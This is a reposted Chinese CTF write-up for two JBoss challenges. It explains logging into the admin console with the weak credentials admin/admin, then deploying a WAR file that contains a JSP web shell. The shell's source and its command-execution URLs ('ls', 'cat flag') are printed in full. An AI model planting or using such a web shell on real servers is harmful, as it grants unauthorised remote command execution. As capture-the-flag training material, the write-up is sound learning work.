栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Java

CTF

Java 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

CTF

0x00 Old But A Little New

两个JBoss题目几乎一模一样,解法也相同,题目只考一个内容,就是Jboss后台上传war包getshell。
首先是一个jboss页面。
后面的wiki等等连接都在jboss的官网,与本题没有关系。

0x01 弱口令登录

第一个路径admin-console,管理员控制台可以直接使用admin、admin的弱口令登录,在后台中找到部署war包的地方上传。(这里的shell.war是已经上传好的)

0x02 上传war包getshell

在这里使用的是TsengYUen师傅的回显jsp一句话,然后使用命令打包。

jar cvf shell.war 1.jsp

一句话的内容为:

<%
   if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("
");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("
"); } %>

部署成功后查看自己的war包:
路径为/shell/1.asp
网页连接列目录

http://51118620.yunyansec.com/shell/1.jsp?pwd=023&i=ls

直接cat flag即可。

http://51118620.yunyansec.com/shell/1.jsp?pwd=023&i=cat%20flag

0x03 asuka

JBoss系列的题目,与上一个JBoss相同的解法,用同一个war包即可。命令执行获取flag

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/270128.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号